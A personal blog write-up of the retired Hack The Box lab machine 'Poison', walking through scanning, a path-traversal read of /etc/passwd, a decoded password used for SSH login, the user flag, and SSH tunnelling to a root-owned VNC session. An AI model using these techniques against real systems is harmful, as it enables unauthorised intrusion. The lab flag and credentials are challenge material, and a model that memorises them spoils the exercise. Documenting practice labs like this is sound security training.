Tuesday, September 18, 2018

Hack The Box Poison Write-up

Poison has been retired i believe for at least 2 weeks now. This box was fun and special to me at the same time.This is the first box that i pwned since joining hack the box. I really had fun with this box.

1. I ran a quick nmap scan against the target which produced the following results.

nmap -sV -v -O -Pn 10.10.10.84
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-09 06:08 EDT
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 06:08
Completed Parallel DNS resolution of 1 host. at 06:08, 0.01s elapsed
Initiating SYN Stealth Scan at 06:08

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
5802/tcp open  http    Bacula http config
5902/tcp open  vnc     VNC (protocol 3.8)
5903/tcp open  vnc     VNC (protocol 3.8)
5904/tcp open  vnc     VNC (protocol 3.8)
6002/tcp open  X11     (access denied)
6003/tcp open  X11     (access denied)
6004/tcp open  X11     (access denied)

2. Once i realized that port 80 was open on this box i quickly opened up a browser and went to the page. looks like this site was accepting php files.






After playing around with the site for a while i stumbled across the browse.php?file=info.txt,  so i swapped out the info.txt with the ../../../../etc/passwd and got the following result.






nikto -h 10.10.10.84
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.84
+ Target Hostname:    10.10.10.84
+ Target Port:        80
+ Start Time:         2018-08-10 22:58:59 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (FreeBSD) PHP/5.6.32
+ Retrieved x-powered-by header: PHP/5.6.32
+ The anti-clickjacking X-Frame-Options header is not present.

+ 1 host(s) tested



dirb http://10.10.10.84/

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Fri Aug 10 23:15:38 2018
URL_BASE: http://10.10.10.84/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                        

---- Scanning URL: http://10.10.10.84/ ----
+ http://10.10.10.84/index.php (CODE:200|SIZE:289)                                      
+ http://10.10.10.84/info.php (CODE:200|SIZE:157)                                        
+ http://10.10.10.84/phpinfo.php (CODE:200|SIZE:68227)                                  
                                                                                         
-----------------
END_TIME: Fri Aug 10 23:24:04 2018
DOWNLOADED: 4612 - FOUND: 3


include_path = ".:/usr/local/www/apache24/data"


Array (  [0] => .  [1] => ..  [2] => browse.php  [3] => index.php  [4] => info.php  [5] => ini.php  [6] => listfiles.php  [7] => phpinfo.php  [8] => pwdbackup.txt )















after decoding the password like 13 times i got the following password

Charix!2#4%6&8(0

NOTE: i was able to log into the box using the following


ssh charix@10.10.10.84

Charix!2#4%6&8(0






FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
charix@Poison:~ % ls -l



 cat user.txt
eaacdfb2d141b72a589233063604209c



root    529  0.0  1.0  25668  9736 v0- I    11:43    0:00.52 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes
root    540  0.0  0.7  67220  7068 v0- I    11:43    0:00.08 xterm -geometry 80x24+10+10 -ls -title X Desktop
root    541  0.0  0.5  37620  5312 v0- I    11:43    0:00.02 twm
root    755  0.0  0.2  10484  2076 v0  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv0
root    756  0.0  0.2  10484  2076 v1  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv1
root    757  0.0  0.2  10484  2076 v2  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv2
root    758  0.0  0.2  10484  2076 v3  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv3
root    759  0.0  0.2  10484  2076 v4  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv4
root    760  0.0  0.2  10484  2076 v5  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv5
root    761  0.0  0.2  10484  2076 v6  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv6
root    762  0.0  0.2  10484  2076 v7  Is+  11:46    0:00.00 /usr/libexec/getty Pc ttyv7
root    554  0.0  0.4  19660  3620  0  Is+  11:43    0:00.03 -csh (csh)
charix 3775  0.0  0.4  19660  3636  1  Is+  13:31    0:00.01 -csh (csh)
charix 1104  0.0  0.7  67220  7440  2- I    11:56    0:00.18 xterm -geometry 80x24+10+10 -ls -title X Desktop
charix 1105  0.0  0.5  37620  5336  2- I    11:56    0:00.03 twm
charix 1141  0.0  0.8  22692  8036  2- S    11:57    0:01.37 Xvnc :3 -desktop X -httpd /usr/local/share/tightvnc/classes
charix 1149  0.0  0.7  67220  7144  2- I    11:57    0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
charix 1150  0.0  0.5  37620  5328  2- I    11:57    0:00.01 twm
charix 1359  0.0  0.7  67220  7144  2- I    12:03    0:00.05 xterm
charix  847  0.0  0.4  19660  3624  3  Is+  11:48    0:00.01 -csh (csh)
charix 1107  0.0  0.4  19660  3640  4  Is   11:56    0:00.02 -csh (csh)
charix 1350  0.0  0.3  13180  2884  4  I    12:03    0:00.01 sh
charix 1561  0.0  0.6  24580  5868  4  I+   12:11    0:00.03 ssh -L 5902:Poison:5802 -i secret charix@10.10.10.84
charix 1152  0.0  0.4  19660  3640  5  Is+  11:57    0:00.01 -csh (csh)
charix 1361  0.0  0.4  19660  3640  6  Is+  12:03    0:00.01 csh
charix 1432  0.0  0.4  19660  3628  7  Is+  12:05    0:00.03 -csh (csh)
charix 1572  0.0  0.4  19660  3632  8  Is+  12:11    0:00.03 -csh (csh)
charix 1799  0.0  0.4  19660  3728  9  Is+  12:24    0:00.05 -csh (csh)
charix 1943  0.0  0.9  24740  8868  9  S    12:30    0:01.33 Xvnc :4 -desktop X -httpd /usr/local/share/tightvnc/classes
charix 1951  0.0  0.7  67220  7208  9  I    12:30    0:00.06 xterm -geometry 80x24+10+10 -ls -title X Desktop
charix 1952  0.0  0.5  37620  5328  9  I    12:30    0:00.01 twm
charix 1828  0.0  0.4  19660  3628 10  Is   12:26    0:00.02 -csh (csh)
charix 1887  0.0  0.6  24580  5820 10  I+   12:28    0:00.02 ssh -L 5901:localhost:5905 -i secret charix@10.10.10.84


looks like the Xvnc service is being run as root



run this from the Kali Box
ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84


connecting to the poison server using the following command
vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding













Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques when it comes to attacking Active Directory En...